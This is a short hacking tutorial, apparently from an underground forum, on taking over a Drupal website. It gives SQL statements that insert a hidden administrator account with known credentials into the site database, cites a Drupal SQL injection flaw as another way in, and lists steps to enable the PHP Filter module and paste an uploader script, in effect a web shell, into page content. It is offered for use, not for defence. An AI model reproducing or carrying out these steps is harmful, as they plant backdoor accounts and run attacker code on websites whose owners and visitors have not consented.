Kod:
#tut by bop
how to hack drupal via phpmyadmin (or another database manager). If you have not database manager try the Drupal SQLi vuln (CVE-2014-3704).
# step 1
go to phpmyadmin
http://localhost/phpmyadmin/index.php
go to your drupal table
create a new user
Code:
INSERT INTO `users` (`uid`, `name`, `pass`, `mail`, `status` ) VALUES
(1337, 'bop', '$S$DIkdNZqdxqh7Tmufxs8l1vAu0wdzxF//smWKAcjCv45KWjK0YFBg', '[email protected]', 1);
and become admin
Code:
INSERT INTO `drupal`.`users_roles` (`uid` ,`rid`) VALUES ('1337', '3');
now you can login to drupal with bop:pwnd
# step 2
1-Go to Modules>List
2-Search for "PHP"
3-☑ PHP Filter | Allows embedded PHP code/snippets to be evaluated.
4-Save Configuration
5-Add/edit content
6-Paste Uploader script in body
7-Change text format to PHP Code
8-Save
# step 3
have fun [IMG]https://bravo.mlc.to/img/smilies/smile.gif[/IMG]
